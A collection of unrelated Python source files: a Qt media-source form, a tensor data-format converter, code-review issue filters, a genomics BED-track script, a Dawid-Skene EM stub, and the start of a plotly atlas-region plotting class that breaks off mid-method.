        # Auto-generated-style Qt layout code: builds the file/url row, type combo,
        # name/season/episode row, description box and save/new buttons.
        Form.setObjectName("Form")
        Form.resize(452, 400)
        self.verticalLayout = QtWidgets.QVBoxLayout(Form)
        self.verticalLayout.setObjectName("verticalLayout")
        self.add_source_label = QtWidgets.QLabel(Form)
        self.add_source_label.setAlignment(QtCore.Qt.AlignCenter)
        self.add_source_label.setObjectName("add_source_label")
        self.verticalLayout.addWidget(self.add_source_label)
        self.frame = QtWidgets.QFrame(Form)
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.file_or_url_hlayout = QtWidgets.QHBoxLayout()
        self.file_or_url_hlayout.setObjectName("file_or_url_hlayout")
        self.file_or_url_edit = QtWidgets.QLineEdit(self.frame)
        self.file_or_url_edit.setText("")
        self.file_or_url_edit.setObjectName("file_or_url_edit")
        self.file_or_url_hlayout.addWidget(self.file_or_url_edit)
        self.file_chooser = QtWidgets.QPushButton(self.frame)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.file_chooser.sizePolicy().hasHeightForWidth())
        self.file_chooser.setSizePolicy(sizePolicy)
        self.file_chooser.setSizeIncrement(QtCore.QSize(0, 0))
        self.file_chooser.setObjectName("file_chooser")
        self.file_or_url_hlayout.addWidget(self.file_chooser)
        self.verticalLayout_2.addLayout(self.file_or_url_hlayout)
        self.line_3 = QtWidgets.QFrame(self.frame)
        self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
        self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line_3.setObjectName("line_3")
        self.verticalLayout_2.addWidget(self.line_3)
        self.type_hlayout = QtWidgets.QHBoxLayout()
        self.type_hlayout.setObjectName("type_hlayout")
        self.type_label = QtWidgets.QLabel(self.frame)
        self.type_label.setMinimumSize(QtCore.QSize(70, 0))
        self.type_label.setObjectName("type_label")
        self.type_hlayout.addWidget(self.type_label)
        self.type_box = QtWidgets.QComboBox(self.frame)
        self.type_box.setEnabled(False)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.type_box.sizePolicy().hasHeightForWidth())
        self.type_box.setSizePolicy(sizePolicy)
        self.type_box.setObjectName("type_box")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_hlayout.addWidget(self.type_box)
        self.verticalLayout_2.addLayout(self.type_hlayout)
        self.from_hlayout = QtWidgets.QHBoxLayout()
        self.from_hlayout.setObjectName("from_hlayout")
        self.name_label = QtWidgets.QLabel(self.frame)
        self.name_label.setMinimumSize(QtCore.QSize(70, 0))
        self.name_label.setObjectName("name_label")
        self.from_hlayout.addWidget(self.name_label)
        self.name_edit = QtWidgets.QLineEdit(self.frame)
        self.name_edit.setReadOnly(True)
        self.name_edit.setObjectName("name_edit")
        self.from_hlayout.addWidget(self.name_edit)
        self.season_label = QtWidgets.QLabel(self.frame)
        self.season_label.setObjectName("season_label")
        self.from_hlayout.addWidget(self.season_label)
        self.season_edit = QtWidgets.QLineEdit(self.frame)
        self.season_edit.setMaximumSize(QtCore.QSize(50, 16777215))
        self.season_edit.setReadOnly(True)
        self.season_edit.setObjectName("season_edit")
        self.from_hlayout.addWidget(self.season_edit)
        self.episode_label = QtWidgets.QLabel(self.frame)
        self.episode_label.setObjectName("episode_label")
        self.from_hlayout.addWidget(self.episode_label)
        self.episode_edit = QtWidgets.QLineEdit(self.frame)
        self.episode_edit.setMaximumSize(QtCore.QSize(50, 16777215))
        self.episode_edit.setReadOnly(True)
        self.episode_edit.setObjectName("episode_edit")
        self.from_hlayout.addWidget(self.episode_edit)
        self.verticalLayout_2.addLayout(self.from_hlayout)
        self.description_hlayout = QtWidgets.QHBoxLayout()
        self.description_hlayout.setObjectName("description_hlayout")
        self.description_label = QtWidgets.QLabel(self.frame)
        self.description_label.setMinimumSize(QtCore.QSize(70, 0))
        self.description_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.description_label.setObjectName("description_label")
        self.description_hlayout.addWidget(self.description_label)
        self.description_edit = QtWidgets.QTextEdit(self.frame)
        self.description_edit.setReadOnly(True)
        self.description_edit.setObjectName("description_edit")
        self.description_hlayout.addWidget(self.description_edit)
        self.verticalLayout_2.addLayout(self.description_hlayout)
        self.verticalLayout.addWidget(self.frame)
        self.save_new_hlayout = QtWidgets.QHBoxLayout()
        self.save_new_hlayout.setObjectName("save_new_hlayout")
        self.save_button = QtWidgets.QPushButton(Form)
        self.save_button.setEnabled(False)
        self.save_button.setObjectName("save_button")
        self.save_new_hlayout.addWidget(self.save_button)
        self.new_button = QtWidgets.QPushButton(Form)
        self.new_button.setObjectName("new_button")
        self.save_new_hlayout.addWidget(self.new_button)
        self.verticalLayout.addLayout(self.save_new_hlayout)
        self.retranslateUi(Form)
        # Index 2 is "Series" — the default type for new sources.
        self.type_box.setCurrentIndex(2)
        QtCore.QMetaObject.connectSlotsByName(Form)

    def retranslateUi(self, Form):
        # Sets all user-visible strings and shortcuts (translatable via Qt).
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        self.add_source_label.setText(_translate("Form", "Add source"))
        self.file_or_url_edit.setPlaceholderText(_translate("Form", "File or url..."))
        self.file_chooser.setText(_translate("Form", "Choose file"))
        self.file_chooser.setShortcut(_translate("Form", "Ctrl+O"))
        self.type_label.setText(_translate("Form", "Type"))
        self.type_box.setItemText(0, _translate("Form", "Audio"))
        self.type_box.setItemText(1, _translate("Form", "Movie"))
        self.type_box.setItemText(2, _translate("Form", "Series"))
        self.type_box.setItemText(3, _translate("Form", "Other"))
        self.name_label.setText(_translate("Form", "From"))
        self.season_label.setText(_translate("Form", "Season"))
        self.episode_label.setText(_translate("Form", "Episode"))
        self.description_label.setText(_translate("Form", "Description"))
        self.save_button.setText(_translate("Form", "Save"))
        self.save_button.setShortcut(_translate("Form", "Ctrl+S"))
        self.new_button.setText(_translate("Form", "New"))
        self.new_button.setShortcut(_translate("Form", "Ctrl+N"))

    def after_setup_ui(self) -> None:
        super().after_setup_ui()
        self.type_box.currentIndexChanged.connect(self.on_type_changed)

    def on_text_changed(self, text: str):
        """Enables the form fields only while the file/url edit has content."""
        if text.strip() == '':
            is_value = False
        else:
            is_value = True
        self.name_edit.setReadOnly(not is_value)
        self.season_edit.setReadOnly(not is_value)
        self.episode_edit.setReadOnly(not is_value)
        self.description_edit.setReadOnly(not is_value)
        self.type_box.setEnabled(is_value)
        self.save_button.setEnabled(is_value)

    def on_type_changed(self, index: int) -> None:
        """Modifies the name / from, season and episode line edits, based on the `index`"""
        if index in [0, 1, 3]:  # audio / movie / other
            # hides the season and episode label / line edit and sets the text of the name / from label to 'Name'
            self.name_label.setText('Name')
            self.season_label.hide()
            self.season_edit.hide()
            self.episode_label.hide()
            self.episode_edit.hide()
        elif index == 2:  # series
            # shows the season and episode label / line edit and sets the text of the name / from label to 'From'
            self.name_label.setText('From')
            self.season_label.show()
            self.season_edit.show()
            self.episode_label.show()
            self.episode_edit.show()

    def on_save(self) -> None:
        """Validates the form, checks for duplicates and stores the source in the
        database, then resets the form via `on_new`.
        """
        # `type` shadowed the builtin; use a descriptive local name instead.
        source_type = Type.Source.from_name(self.type_box.currentText().lower())
        if not source_type:
            return
        file_or_url = self.file_or_url_edit.text()
        name = self.name_edit.text()
        description = self.description_edit.toPlainText()
        season = self.season_edit.text()
        episode = self.episode_edit.text()
        # it checks if some of the data is already in the database
        if source_type == Type.Source.SERIES and self.database.Source.has(type=source_type.value, name=name, season=season, episode=episode):
            has_same = True
        elif source_type != Type.Source.SERIES and self.database.Source.has(name=name):
            has_same = True
        else:
            has_same = False
        if has_same:
            # if some of the data were in the database it checks if the exact same data is in the database
            if self.database.Source.has(path=file_or_url, type=source_type.value, name=name, description=description, season=season, episode=episode):
                QtWidgets.QMessageBox.warning(self.window, 'The source already exist', 'A source with the exact same data (name, description, type, etc.) already exist')
                return
            elif source_type == Type.Source.SERIES:
                proceed = QtWidgets.QMessageBox.question(self.window, 'The source may already exist', 'A source with some same data (name, season and episode at least) already exist. '
                                                         'Do you want to proceed?', QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
                # BUGFIX: question() returns the clicked StandardButton, which is a
                # non-zero (truthy) value for both Yes and No — `if not proceed:` never
                # fired, so a "No" answer was silently ignored. Compare explicitly.
                if proceed == QtWidgets.QMessageBox.No:
                    return
        self.database.Source.add_source(self.file_or_url_edit.text(), source_type.value, self.name_edit.text(), self.description_edit.toPlainText(), self.season_edit.text(), self.episode_edit.text())
        logger.debug(f'Added new source - file / url: "{self.file_or_url_edit.text()}", name: "{self.name_edit.text()}", description: "{self.description_edit.toPlainText()}", '
                     f'season: "{self.season_edit.text()}", episode: "{self.episode_edit.text()}"')
        self.on_new()

    def on_new(self) -> None:
        """Resets the form so a new source can be entered."""
        self.file_or_url_edit.setText('')
        self.type_box.setCurrentIndex(2)
        self.name_edit.setText('')
        self.season_edit.setText('')
        self.episode_edit.setText('')
        self.description_edit.setText('')
|
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import enum
from polygraphy.logger import G_LOGGER
# TRT does not include batch dimension.
class DataFormat(enum.IntEnum):
    """Tensor data layouts this module can reason about.

    Letters: N = batch, C = channels, H = height, W = width.
    """
    UNKNOWN = 0
    NW = 1
    NHW = 2
    CHW = 3
    NHWC = 4
    NCHW = 5
# This class is responsible for deducing the format of a shape,
# and converting it to the desired format (specified as a DataFormat).
class FormatManager(object):
    """Deduces the data format of a shape and permutes shapes between formats."""

    # NOTE: New permutations should be added in this function, as it will automatically generate the inverses.
    # This runs once, at class-creation time, to populate DATA_PERMUTATIONS below.
    def _generate_permutations():
        def is_invertible(perm):
            # Only true permutations of [0, len(perm)) can be inverted: entries of -1
            # (dummy-dimension markers) or dropped dimensions make the mapping lossy.
            return min(perm) >= 0 and max(perm) < len(perm)

        def inverse_permutation(perm):
            # Proper inverse: if perm maps position i -> value v, the inverse maps v -> i.
            # BUGFIX: the previous implementation returned [perm[i] for i in perm]
            # (perm composed with itself), which only equals the inverse for
            # permutations whose cube is the identity — true for the current table,
            # but wrong for any new 4-cycle permutation added later.
            inverse = [0] * len(perm)
            for index, value in enumerate(perm):
                inverse[value] = index
            return inverse

        # Inverse permutations are generated automatically below.
        # We use -1 to denote that a dummy dimension of 1 should be inserted in the convert function.
        initial_permutations = {
            (DataFormat.NCHW, DataFormat.NCHW): (0, 1, 2, 3),
            (DataFormat.NHWC, DataFormat.NHWC): (0, 1, 2, 3),
            (DataFormat.NHWC, DataFormat.NCHW): (0, 3, 1, 2),
            (DataFormat.CHW, DataFormat.CHW): (0, 1, 2),
            (DataFormat.NCHW, DataFormat.CHW): (1, 2, 3),
            (DataFormat.NHWC, DataFormat.CHW): (3, 1, 2),
            (DataFormat.NHW, DataFormat.CHW): (-1, 1, 2),
            (DataFormat.NW, DataFormat.CHW): (-1, -1, 1),
        }
        permutations = {}
        for (f1, f2), perm in initial_permutations.items():
            permutations[(f1, f2)] = perm
            if is_invertible(perm):
                permutations[(f2, f1)] = inverse_permutation(perm)
        return permutations

    # Dict[Tuple[DataFormat, DataFormat], Tuple[int]]
    # This provides the correct permutation for various data format conversions.
    DATA_PERMUTATIONS = _generate_permutations()

    @staticmethod
    def determine_format(shape):
        """
        Guesses the data format of a given shape.

        Args:
            shape (Tuple[int]): The shape, including batch dimension.

        Returns:
            DataFormat: The determined data format.
        """
        # The smaller this ratio, the closer a and b are.
        def minmax_ratio(a, b):
            return abs(max(a, b) / min(a, b))

        # Assume all shapes include batch dimension
        if len(shape) == 4:
            # Typically, H and W are quite close, so if minmax_ratio(0, 1) > minmax_ratio(1, 2), then we assume CHW.
            if minmax_ratio(shape[1], shape[2]) > minmax_ratio(shape[2], shape[3]):
                return DataFormat.NCHW
            return DataFormat.NHWC
        elif len(shape) == 3:
            return DataFormat.NHW
        elif len(shape) == 2:
            return DataFormat.NW
        else:
            G_LOGGER.warning(
                "Cannot determine format for "
                + str(shape)
                + ". Currently only implemented for input_buffers with 1-3 non-batch dimensions. Please update this function!"
            )
            return DataFormat.UNKNOWN

    # Get the permutation required to transpose old_format to new_format
    @staticmethod
    def permutation(old_format, new_format):
        return FormatManager.DATA_PERMUTATIONS[(old_format, new_format)]

    @staticmethod
    def convert(shape, new_format):
        """
        Permutes a shape from one format to another.

        Args:
            shape (Tuple[int]): The shape to convert.
            new_format (DataFormat): The desired format of the shape.

        Returns:
            Tuple[int]: A new shape in the correct format.
        """
        old_format = FormatManager.determine_format(shape)
        perm = FormatManager.permutation(old_format, new_format)
        # -1 entries insert a dummy dimension of size 1.
        return [shape[index] if index != -1 else 1 for index in perm]
|
from collections import defaultdict
from typing import Dict, List, Tuple
from src.python.review.common.language import Language
from src.python.review.inspectors.issue import BaseIssue, IssueType, Measurable
from src.python.review.quality.rules.boolean_length_scoring import LANGUAGE_TO_BOOLEAN_EXPRESSION_RULE_CONFIG
from src.python.review.quality.rules.class_response_scoring import LANGUAGE_TO_RESPONSE_RULE_CONFIG
from src.python.review.quality.rules.coupling_scoring import LANGUAGE_TO_COUPLING_RULE_CONFIG
from src.python.review.quality.rules.cyclomatic_complexity_scoring import LANGUAGE_TO_CYCLOMATIC_COMPLEXITY_RULE_CONFIG
from src.python.review.quality.rules.function_length_scoring import LANGUAGE_TO_FUNCTION_LENGTH_RULE_CONFIG
from src.python.review.quality.rules.inheritance_depth_scoring import LANGUAGE_TO_INHERITANCE_DEPTH_RULE_CONFIG
from src.python.review.quality.rules.method_number_scoring import LANGUAGE_TO_METHOD_NUMBER_RULE_CONFIG
from src.python.review.quality.rules.weighted_methods_scoring import LANGUAGE_TO_WEIGHTED_METHODS_RULE_CONFIG
def __get_issue_type_to_low_measure_dict(language: Language) -> Dict[IssueType, int]:
    """Maps each measurable issue type to its per-language 'low measure' threshold.

    The thresholds come from the language-specific rule configs; issues measuring
    at or below these values are filtered out (see `filter_low_measure_issues`).
    """
    return {
        IssueType.CYCLOMATIC_COMPLEXITY: LANGUAGE_TO_CYCLOMATIC_COMPLEXITY_RULE_CONFIG[language].cc_value_moderate,
        IssueType.FUNC_LEN: LANGUAGE_TO_FUNCTION_LENGTH_RULE_CONFIG[language].func_len_bad,
        IssueType.BOOL_EXPR_LEN: LANGUAGE_TO_BOOLEAN_EXPRESSION_RULE_CONFIG[language].bool_expr_len_good,
        IssueType.INHERITANCE_DEPTH: LANGUAGE_TO_INHERITANCE_DEPTH_RULE_CONFIG[language].depth_bad,
        IssueType.METHOD_NUMBER: LANGUAGE_TO_METHOD_NUMBER_RULE_CONFIG[language].method_number_good,
        IssueType.COUPLING: LANGUAGE_TO_COUPLING_RULE_CONFIG[language].coupling_moderate,
        IssueType.CLASS_RESPONSE: LANGUAGE_TO_RESPONSE_RULE_CONFIG[language].response_good,
        IssueType.WEIGHTED_METHOD: LANGUAGE_TO_WEIGHTED_METHODS_RULE_CONFIG[language].weighted_methods_good
    }
def __more_than_low_measure(issue: BaseIssue, issue_type_to_low_measure_dict: Dict[IssueType, int]) -> bool:
    """Returns False for measurable issues at or below their low-measure threshold.

    Non-measurable issues, and types without a configured threshold, always pass.
    """
    low_measure = issue_type_to_low_measure_dict.get(issue.type, -1)
    return not (isinstance(issue, Measurable) and issue.measure() <= low_measure)
def filter_low_measure_issues(issues: List[BaseIssue],
                              language: Language) -> List[BaseIssue]:
    """Drops ignored issue types and measurable issues below their thresholds."""
    low_measures = __get_issue_type_to_low_measure_dict(language)
    # Disable this types of issue, requires further investigation.
    ignored_issues = [IssueType.COHESION, IssueType.CHILDREN_NUMBER]
    return [issue for issue in issues
            if issue.type not in ignored_issues
            and __more_than_low_measure(issue, low_measures)]
# Readable aliases used by the GroupedIssues structure below.
FilePath = str
LinesNumber = int
Inspector = str
# Issues grouped as: file path -> line number -> inspector -> issue type -> issues.
GroupedIssues = Dict[FilePath, Dict[LinesNumber, Dict[Inspector, Dict[IssueType, List[BaseIssue]]]]]
def __init_grouped_issues() -> GroupedIssues:
    """Creates an empty 4-level nested default mapping (see GroupedIssues)."""
    return defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list))))
def filter_duplicate_issues(issues: List[BaseIssue]) -> List[BaseIssue]:
    """
    Skipping duplicate issues using heuristic rules:
    For each line's number try to count issues with unique type for each unique inspector and select the best one.
    The inspector with the biggest number of issues for each type will be chosen.
    """
    selected_issues = []
    for issues_in_file in group_issues(issues).values():
        for issues_in_line in issues_in_file.values():
            if len(issues_in_line) == 1:
                # No conflicts: a single inspector reported here, keep all its issues.
                for types_by_inspector in issues_in_line.values():
                    for issues_by_type in types_by_inspector.values():
                        selected_issues.extend(issues_by_type)
            elif len(issues_in_line) > 1:
                # Conflicts: several inspectors reported on this line. For each issue
                # type, keep the inspector that found the most issues of that type.
                default_inspector = 'UNKNOWN'
                # By default for each <IssueType> we add the tuple (inspector: 'UNKNOWN', issue_type_freq: -1)
                inspectors_by_types: Dict[IssueType, Tuple[Inspector, int]] = defaultdict(
                    lambda: (default_inspector, -1))
                for inspector, issues_by_types in issues_in_line.items():
                    # Handle all possible issue types
                    for issue_type in IssueType:
                        issue_type_freq = len(issues_by_types.get(issue_type, []))
                        if issue_type_freq == 0:
                            # This <issue_type> was not found by the <inspector>
                            continue
                        # Current inspector has more issues of this type than previous ones.
                        if issue_type_freq > inspectors_by_types[issue_type][1]:
                            inspectors_by_types[issue_type] = (inspector, issue_type_freq)
                for issue_type, (inspector, _) in inspectors_by_types.items():
                    if inspector != default_inspector:
                        selected_issues.extend(issues_in_line[inspector][issue_type])
    return selected_issues
def group_issues(issues: List[BaseIssue]) -> GroupedIssues:
    """
    Group issues according to the following structure:

    - FILE_PATH:
      - LINES_NUMBER:
        - INSPECTOR:
          - ISSUE_TYPE:
            [ISSUES]

    We will consider each file to find potential duplicates:
    if one line number in the file contains several same issues which were found by different inspectors,
    we will try to find the best one. See <filter_duplicate_issues> function.
    """
    grouped: GroupedIssues = __init_grouped_issues()
    for issue in issues:
        issues_on_line = grouped[str(issue.file_path)][issue.line_no]
        issues_on_line[str(issue.inspector_type)][issue.type].append(issue)
    return grouped
|
<filename>scripts/get_validated_rule_tracks.py<gh_stars>1-10
import os
import re
import sys
import glob
import json
import pandas as pd
import networkx as nx
def get_bed_from_nx_graph(
        graph,
        bed_file,
        interval_key="active",
        merge=True,
        return_key="region"):
    """get BED file from nx examples

    Writes one BED line (chrom, start, stop) per example stored in
    graph.graph["examples"] and returns the list of `return_key` values.
    Python 2 only: relies on the `basestring` builtin.
    When `merge` is True, shells out to sort/bedtools/bgzip to merge and
    renumber the intervals in place (bed_file ends up bgzipped).
    """
    # Examples may be stored as one comma-separated string; normalize to a list.
    if isinstance(graph.graph["examples"], basestring):
        graph.graph["examples"] = graph.graph["examples"].split(",")
    examples = list(graph.graph["examples"])
    return_intervals = []
    with open(bed_file, "w") as fp:
        for region_metadata in examples:
            # Metadata format: "key1=val1;key2=val2;..." — parse into a dict.
            interval_types = region_metadata.split(";")
            interval_types = dict([
                interval_type.split("=")[0:2]
                for interval_type in interval_types])
            # interval string looks like "chrom:start-stop"
            interval_string = interval_types[interval_key]
            return_intervals.append(interval_types[return_key])
            chrom = interval_string.split(":")[0]
            start = interval_string.split(":")[1].split("-")[0]
            stop = interval_string.split("-")[1]
            fp.write("{0}\t{1}\t{2}\n".format(chrom, start, stop))
    if merge:
        # merge
        tmp_bed_file = "{}.tmp.bed".format(bed_file.split(".bed")[0])
        os.system("mv {} {}".format(bed_file, tmp_bed_file))
        os.system("cat {} | sort -k1,1 -k2,2n | bedtools merge -i stdin | bgzip > {}".format(
            tmp_bed_file, bed_file))
        os.system("rm {}".format(tmp_bed_file))
        # renumber
        tmp_bed_file = "{}.tmp.bed.gz".format(bed_file.split(".bed")[0])
        os.system("mv {} {}".format(bed_file, tmp_bed_file))
        #os.system("zcat {} | awk -F '\t' '{{ print $1\"\t\"$2\"\t\"$3\"\t\"$1\":\"$2\"-\"$3\"\t\"NR\"\t+\" }}' | bgzip -c > {}".format(
        #    tmp_bed_file, bed_file))
        os.system("zcat {} | awk -F '\t' '{{ print $1\"\t\"$2\"\t\"$3\"\ttest\"NR\"\t\"NR\"\t.\" }}' | bgzip > {}".format(
            tmp_bed_file, bed_file))
        os.system("rm {}".format(tmp_bed_file))
        # bgzip
        #new_tmp_bed_file = "{}.bed".format(tmp_bed_file.split(".tmp")[0])
        #os.system("mv {} {}".format(tmp_bed_file, new_tmp_bed_file))
        #os.system("bgzip {}".format(new_tmp_bed_file))
        #os.system("rm {}".format(tmp_bed_file))
    return return_intervals
def _make_json_bed_entry(bed_file, display_name, dir_url):
    """add a bed file to json

    Builds one genome-browser track entry pointing at dir_url/bed_file.
    """
    return {
        "type": "bed",
        "url": "{}/{}".format(dir_url, bed_file),
        "name": display_name,
        "mode": "full",
    }
def main():
    """pull the region sets as bed files to visualize results

    Python 2 script entry point (uses a print statement below).
    Reads an MPRA summary table and a directory of rule .gml graphs,
    writes one bgzipped BED (plus .tbi index) per validated rule, and emits
    a browser-track JSON file describing all of them.
    """
    # input files
    mpra_file = sys.argv[1]
    rule_dir = sys.argv[2]
    dir_url = "http://mitra.stanford.edu/kundaje/dskim89/ggr/paper"
    # for rule in rule dir, pull the BED file from it
    rules = pd.read_csv(mpra_file, sep="\t")
    # keep only rules whose interaction did not fail validation
    rules = rules[~rules["interaction"].str.contains("FAILED")]
    json_entries = []
    for rule_idx in range(rules.shape[0]):
        rule_name = rules["grammar"].iloc[rule_idx]
        pwm1_name = rules["pwm1_clean"].iloc[rule_idx]
        pwm2_name = rules["pwm2_clean"].iloc[rule_idx]
        # get gml file
        gml_file = "{}/{}.gml".format(rule_dir, rule_name)
        graph = nx.read_gml(gml_file)
        # make bed file (skipped if it already exists from a previous run)
        bed_file = "{}.{}_x_{}.bed.gz".format(rule_name, pwm1_name, pwm2_name)
        if not os.path.isfile(bed_file):
            print bed_file
            get_bed_from_nx_graph(
                graph,
                bed_file,
                interval_key="active",
                merge=True,
                return_key="region")
            os.system("chmod a+x {}".format(bed_file))
        display_name = bed_file.split(".")[-3]
        json_entry = _make_json_bed_entry(bed_file, display_name, dir_url)
        json_entries.append(json_entry)
        # also make a tbi file
        make_tbi = "tabix -p bed {}".format(bed_file)
        tbi_file = "{}.tbi".format(bed_file)
        if not os.path.isfile(tbi_file):
            os.system(make_tbi)
    # set up json file with appropriate names
    json_file = "combinatorial_rules.json"
    json_data = json.dumps(json_entries, indent=1)
    # strip quotes from keys (browser config expects bare identifiers)
    json_data = re.sub(r'"(.*?)"(?=:)', r'\1', json_data)
    with open(json_file, "w") as fp:
        fp.write(json_data)
    return
# Guard the entry point so importing this module does not run the pipeline.
if __name__ == "__main__":
    main()
|
<reponame>prijatelj/bayesian_eval_ground_truth-free
"""
All implemnetations of Dawid and Skene's EM algorithm, including the original,
hierarchial, and spectral.
"""
import math
import csv
import random
import sys
import numpy as np
from scipy.sparse import spmatrix # only necessary if the given sparse matrix need detected and handled carefully (ie. operations used do not exist for sparse matrices or would be inefficent.
class DawidSkene(object):
    """Original Dawid and Skene EM algorithm that estimates the true values of
    the labels from the annotation data. This is intended for classification
    tasks only and would need to be modified to handle regression tasks
    (confusion matrices, marginal probabilities, etc. would all become densities
    and be changed in how they are applied).

    Attributes
    ----------
    annotations : array-like
        The observed data (X in wikipedia).
        The annotators' annotations.
    unobserved_data : array-like NOTE THAT THIS DOES NOT EXIST IN DAWID & SKENE????
        The unobserved data, missing values, or latent variables (Z in wikipedia).
        ? the bias, characteristics, etc of annotators?
        The confusion matrices of every annotator.
    confusion_matrices : array-like
        The confusion matrices of every annotator. Indexed by the k annotators,
        and then each matrix is a dense matrix of lxl where l is the possible
        label values.
    truth_inference_estimates: array-like
        The parameter_estimates vector of estimates for the unknown parameters (Theta in wikipedia).
        If given, then it serves as a prior.
        The truth inference of the samples.
    marginal_probabilities : array-like
        The marginal probabilities of the values of the annotation labels.
    likelihood_function : array-like
        The likelihood function L(Theta; X, Z) = p(X,Z|Theta)
    ground_truth : array-like, optional
        In the case that the ground truth is provided, it can be used to ...
    random_state : numpy.random.RandomState
        The random_state of this model. This will not be used if prior
        truth_inference_estimates are provided to model.
    """

    def __init__(self, annotations, truth_inference_estimates=None, ground_truth=None, random_state=None):
        """Initializes the Dawid and Skene Expectation Maximization algorithm.

        Parameters
        ----------
        """
        self.reinit(annotations, truth_inference_estimates, ground_truth, random_state)

    def reinit(self, annotations, truth_inference_estimates=None, ground_truth=None, random_state=None):
        """Reinitializes the Dawid and Skene Expectation Maximization algorithm

        Parameters
        ----------
        """
        # CHECKS:
        # get number of annotators from observed data
        #annotator_ids, annotator_annotations, indices = np.unique(annotations, return_counts=True, return_index=True)
        #annotator_count = len(annotator_ids)
        # get number of annoations from an annotator per sample to handle
        # multi-labeling, also preserve order if possible.
        #for i, annotator in enumerate(annotator_ids):
        # TODO Initialize truth_inference_estimates.
        # discrete/classification only is:
        # np.empty(parameters_count, number_of_possible_label_values).fill(1/parameters_count)
        # should be able to do continuous values for regression by statement on EM...
        #self.truth_inference_estimates = if truth_inference_estimates is None else truth_inference_estimates

    def fit(self, iterations, threshold=None):
        """Runs the EM algorithm for either a given number of iterations or
        until a threshold is met.

        Parameters
        ----------
        iterations : int, optional
            The explicit number of maximum iterations to perform. Will complete
            exactly this many iterations if threshold is not set and is not met
            prior to this maximum number of iterations.
        threshold : float, optional
            The threshold for the minimum amount of change in the estimated
            parameters that is acceptable for the algorithm to terminate.
        """
        iteration_count = 0
        previous_truth_inference_estimates = self.truth_inference_estimates
        # Seed the difference above any threshold so the loop always runs at
        # least once. BUGFIX: the original computed `threshold + 1`, which
        # raised TypeError whenever `threshold` was left as its default None.
        parameter_difference = math.inf
        while iteration_count < iterations and (threshold is None or parameter_difference > threshold):
            self.expectation_step()
            self.maximization_step()
            iteration_count += 1
            if threshold is not None:
                # TODO: this should measure the change between the previous and
                # the current estimates; abs(previous) is a placeholder carried
                # over from the original implementation.
                parameter_difference = abs(previous_truth_inference_estimates)

    def calculate_threshold(self):
        """In the case EM continues until a threshold of minimal change is met."""
        # TODO, but probably can be done in fit, itself by saving the prior truth_inference_estimates and comparing the difference to some threshold.
        return

    def expectation_step(self):
        """Update

        Compute the probability of each possible value of the unobserved data given the parameter estimates
        """
        # confusion matrix for every annotator: k_{j,l} = Sum_i(T_{i,j}n_{i,l})/Sum_i(Sum_j(T_{i,j}n_{i,l}))
        # marginal probabilities

    def maximization_step(self):
        """Compute better parameter estimates using the just-computed expectations
        """
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from __future__ import print_function
__author__ = 'seelviz'
from plotly.offline import download_plotlyjs
from plotly.graph_objs import *
from plotly import tools
import plotly
import os
#os.chdir('C:/Users/L/Documents/Homework/BME/Neuro Data I/Data/')
import csv,gc # garbage memory collection :)
import numpy as np
# import matplotlib.pyplot as plt
# from mpl_toolkits.mplot3d import axes3d
# from mpl_toolkits.mplot3d import axes3d
# from collections import namedtuple
import csv
import re
import matplotlib
import time
import seaborn as sns
from collections import OrderedDict
class atlasregiongraph(object):
    """Class for generating the color coded atlas region graphs

    Python 2 only: uses itertools.izip and binary-mode csv writing below.
    Reads <token>.region.csv (x, y, z, region columns) and renders a plotly
    3D point cloud colored by atlas region.
    """

    def __init__(self, token, path=None):
        # token identifies the dataset; files default to output/<token>/.
        self._token = token
        self._path = path
        data_txt = ""
        if path == None:
            data_txt = 'output/' + token + '/' + token + '.region.csv'
            self._path = 'output/' + token
        else:
            data_txt = path + '/' + token + '.region.csv'
        # Columns 0-2 are x/y/z coordinates, column 4 is the atlas region id.
        self._data = np.genfromtxt(data_txt, delimiter=',', dtype='int', usecols = (0,1,2,4), names=['x','y','z','region'])

    def generate_atlas_region_graph(self, resolution, path=None, numRegions = 10):
        # Large bold font for any matplotlib output.
        font = {'weight' : 'bold',
                'size'   : 18}

        matplotlib.rc('font', **font)

        thedata = self._data

        if path == None:
            thedata = self._data
        else:
            ### load data
            # NOTE(review): this reloads from self._path/self._token and ignores
            # the `path` argument's value — confirm intended behavior.
            thedata = np.genfromtxt(self._path + '/' + self._token + '.region.csv', delimiter=',', dtype='int', usecols = (0,1,2,4), names=['x','y','z','region'])

        # Set tupleResolution to resolution input parameter
        tupleResolution = resolution;

        # EG: for Aut1367, the spacing is (0.01872, 0.01872, 0.005).
        xResolution = tupleResolution[0]
        yResolution = tupleResolution[1]
        zResolution = tupleResolution[2]
        # Now, to get the mm image size, we can multiply all x, y, z
        # to get the proper mm size when plotting.

        """Load the CSV of the ARA with CCF v2 (see here for docs:)"""
        ccf_txt = './../ccf/natureCCFOhedited.csv'

        # Map: atlas index (string) -> full region name.
